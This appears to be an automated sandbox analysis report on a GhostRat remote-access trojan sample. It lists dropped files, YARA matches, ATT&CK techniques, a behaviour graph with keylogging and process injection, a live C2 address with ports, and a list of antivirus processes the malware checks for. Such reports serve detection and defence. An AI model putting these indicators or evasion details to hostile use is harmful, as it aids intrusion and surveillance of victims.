                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeCode function: 0_2_00401626 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00401626
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034F5D22 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,3_2_034F5D22
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeCode function: 0_2_00404FAA GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,memset,ShellExecuteExW,WaitForSingleObject,CloseHandle,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,0_2_00404FAA
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: Update.exeBinary or memory string: acs.exe
                      Source: Update.exeBinary or memory string: vsserv.exe
                      Source: Update.exeBinary or memory string: kxetray.exe
                      Source: Update.exeBinary or memory string: avcenter.exe
                      Source: Update.exeBinary or memory string: KSafeTray.exe
                      Source: Update.exeBinary or memory string: cfp.exe
                      Source: Update.exeBinary or memory string: avp.exe
                      Source: Update.exeBinary or memory string: 360Safe.exe
                      Source: Update.exeBinary or memory string: rtvscan.exe
                      Source: Update.exeBinary or memory string: 360tray.exe
                      Source: Update.exeBinary or memory string: ashDisp.exe
                      Source: Update.exeBinary or memory string: TMBMSRV.exe
                      Source: Update.exeBinary or memory string: 360Tray.exe
                      Source: Update.exeBinary or memory string: avgwdsvc.exe
                      Source: Update.exeBinary or memory string: AYAgent.aye
                      Source: Update.exeBinary or memory string: RavMonD.exe
                      Source: Update.exeBinary or memory string: QUHLPSVC.EXE
                      Source: Update.exeBinary or memory string: Mcshield.exe
                      Source: Update.exeBinary or memory string: K7TSecurity.exe

                      Stealing of Sensitive Information

                      barindex
                      Yara detected GhostRat
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.30405bf.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.34e0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.469260b.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.47210a3.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.3001004.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.5e4023.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.47210a3.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.34e0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.32e1053.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.32e1053.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.3001004.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.5e4023.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.30405bf.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.469260b.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.2585756688.00000000005E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2921881516.0000000004691000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.3251872110.0000000004691000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3564033728.0000000003000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.3080679847.0000000004691000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2762477025.000000000466D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.3080736947.0000000004691000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3564873344.0000000004691000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.3409527868.0000000004691000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3564258911.00000000032E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.3409583001.0000000004691000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2921820628.0000000004691000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2585718270.0000000004721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.3251923275.0000000004691000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2762513988.0000000004691000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Update.exe PID: 7652, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected GhostRat
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.30405bf.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.34e0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.469260b.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.47210a3.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.3001004.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.5e4023.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.47210a3.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.34e0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.32e1053.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.32e1053.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.3001004.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.5e4023.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.30405bf.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.469260b.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.469260b.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.2585756688.00000000005E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2921881516.0000000004691000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.3251872110.0000000004691000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3564033728.0000000003000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.3080679847.0000000004691000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2762477025.000000000466D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.3080736947.0000000004691000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3564873344.0000000004691000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.3409527868.0000000004691000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3564258911.00000000032E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.3409583001.0000000004691000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2921820628.0000000004691000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2585718270.0000000004721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.3251923275.0000000004691000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2762513988.0000000004691000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Update.exe PID: 7652, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information1
                      Scripting                      		1
                      Replication Through Removable Media                      		1
                      Windows Management Instrumentation                      		1
                      Scripting                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		121
                      Input Capture                      		2
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Ingress Tool Transfer                      		Exfiltration Over Other Network Medium1
                      Data Encrypted for Impact
                      CredentialsDomainsDefault Accounts1
                      Native API                      		1
                      DLL Side-Loading                      		1
                      Access Token Manipulation                      		1
                      Deobfuscate/Decode Files or Information                      		LSASS Memory11
                      Peripheral Device Discovery                      		Remote Desktop Protocol1
                      Screen Capture                      		2
                      Encrypted Channel                      		Exfiltration Over Bluetooth1
                      System Shutdown/Reboot
                      Email AddressesDNS ServerDomain Accounts1
                      PowerShell                      		Logon Script (Windows)222
                      Process Injection                      		2
                      Obfuscated Files or Information                      		Security Account Manager3
                      File and Directory Discovery                      		SMB/Windows Admin Shares121
                      Input Capture                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      DLL Side-Loading                      		NTDS38
                      System Information Discovery                      		Distributed Component Object Model2
                      Clipboard Data                      		1
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Masquerading                      		LSA Secrets131
                      Security Software Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Modify Registry                      		Cached Domain Credentials31
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                      Virtualization/Sandbox Evasion                      		DCSync4
                      Process Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Access Token Manipulation                      		Proc Filesystem1
                      Application Window Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt222
                      Process Injection                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      Indicator Removal                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1584889 Sample: ErbgterT2R.exe Startdate: 06/01/2025 Architecture: WINDOWS Score: 100 65 Suricata IDS alerts for network traffic 2->65 67 Found malware configuration 2->67 69 Multi AV Scanner detection for dropped file 2->69 71 8 other signatures 2->71 9 ErbgterT2R.exe 10 2->9         started        process3 file4 51 C:\Users\Public\Bilite\Axialis\Update.exe, PE32 9->51 dropped 53 C:\Users\Public\Bilite\Axialis\Update.dll, PE32 9->53 dropped 55 C:\Users\Public\Bilite\360inst_install.exe, PE32 9->55 dropped 12 cmd.exe 1 9->12         started        process5 signatures6 73 Bypasses PowerShell execution policy 12->73 15 Update.exe 3 8 12->15         started        20 conhost.exe 12->20         started        process7 dnsIp8 57 134.122.155.39, 15091, 18852, 49900 BCPL-SGBGPNETGlobalASNSG United States 15->57 45 C:\Users\user\AppData\Local\Temp\backup.exe, PE32 15->45 dropped 47 C:\Users\user\AppData\Local\Temp\backup.dll, PE32 15->47 dropped 49 C:\Users\user\AppData\Local\updated.ps1, ASCII 15->49 dropped 59 Contains functionality to inject threads in other processes 15->59 61 Contains functionality to capture and log keystrokes 15->61 63 Contains functionality to inject code into remote processes 15->63 22 cmd.exe 1 15->22         started        24 cmd.exe 1 15->24         started        26 cmd.exe 1 15->26         started        file9 signatures10 process11 process12 28 powershell.exe 1 23 22->28         started        31 conhost.exe 22->31         started        33 powershell.exe 37 24->33         started        35 conhost.exe 24->35         started        37 conhost.exe 26->37         started        39 tasklist.exe 1 26->39         started        41 timeout.exe 1 26->41         started        43 10 other processes 26->43 signatures13 75 Loading BitLocker PowerShell Module 33->75

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      ErbgterT2R.exe37%ReversingLabsWin32.Ransomware.Generic

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\Public\Bilite\360inst_install.exe17%ReversingLabs
                      C:\Users\Public\Bilite\Axialis\Update.dll48%ReversingLabsWin32.Trojan.Generic
                      C:\Users\Public\Bilite\Axialis\Update.exe0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\backup.dll48%ReversingLabsWin32.Trojan.Generic
                      C:\Users\user\AppData\Local\Temp\backup.exe0%ReversingLabs

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://sfdw.360safe.com/setup.exe.exe0%Avira URL Cloudsafe
                      http://bbs.360.cn/thread-15735708-1-1.htmlPA1http://www.360.cn/privacy/v3/360anquanweishi.htmlPA0%Avira URL Cloudsafe
                      http://pinst.360.cn/360safe/h_inst.cab0%Avira URL Cloudsafe
                      http://%s/gf/360ini.cabhttp://dl.360safe.com/gf/360ini.cab0%Avira URL Cloudsafe
                      http://pinst.360.cn/360se/wssj_setup.cab0%Avira URL Cloudsafe
                      http://sfdw.360safe.com/safesetup_2000.exe3600%Avira URL Cloudsafe
                      http://pinst.360.cn/zhuomian/desktopsafe.cab0%Avira URL Cloudsafe
                      http://sfdw.360safe.com/setupbeta.exe4(u7b4N0%Avira URL Cloudsafe
                      http://home.arcor.de/starwalker22/Test/UrlExtractDemo.cab0%Avira URL Cloudsafe
                      http://pinst.360.cn/360haohua/safe_chaoqiang.cab?0%Avira URL Cloudsafe
                      https://bbs.360.cn/thread-16079507-1-1.htmlD0%Avira URL Cloudsafe
                      http://sfdw.360safe.com/superkiller/superkillerexe_880765522ded7527821ce7448af08018_5.1.64.1181.cabh0%Avira URL Cloudsafe
                      134.122.155.39:150920%Avira URL Cloudsafe
                      134.122.155.39:150910%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      134.122.155.39:15092true
                      • Avira URL Cloud: safe
                      		unknown
                      134.122.155.39:15091true
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://%s/gf/360ini.cabhttp://dl.360safe.com/gf/360ini.cab360inst_install.exe.0.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://nuget.org/NuGet.exepowershell.exe, 00000012.00000002.2634350577.0000000005DB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2643287383.00000000059E6000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000012.00000002.2632273712.0000000004EA5000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&http://s.360.cn/safe/instcomp360inst_install.exe.0.drfalse
                            		high
                            https://sectigo.com/CPS0ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.drfalse
                              		high
                              http://down.360safe.com/setup.exehttp://down.360safe.com/setupbeta.exe360inst_install.exe.0.drfalse
                                		high
                                http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.drfalse
                                  		high
                                  http://ocsp.sectigo.com0ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.drfalse
                                    		high
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000013.00000002.2633221267.0000000004AD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://pinst.360.cn/zhuomian/desktopsafe.cab360inst_install.exe.0.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000012.00000002.2632273712.0000000004EA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2633221267.0000000005144000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2633221267.0000000004AD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://sfdw.360safe.com/setup.exe.exeErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000013.00000002.2633221267.0000000004AD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://hao.360.com360inst_install.exe.0.drfalse
                                            		high
                                            https://contoso.com/Licensepowershell.exe, 00000013.00000002.2643287383.00000000059E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/Iconpowershell.exe, 00000013.00000002.2643287383.00000000059E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.drfalse
                                                  		high
                                                  http://home.arcor.de/starwalker22/Test/UrlExtractDemo.cab360inst_install.exe.0.drfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.drfalse
                                                    		high
                                                    https://github.com/Pester/Pesterpowershell.exe, 00000013.00000002.2633221267.0000000004AD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://pinst.360.cn/360se/wssj_setup.cab360inst_install.exe.0.drfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
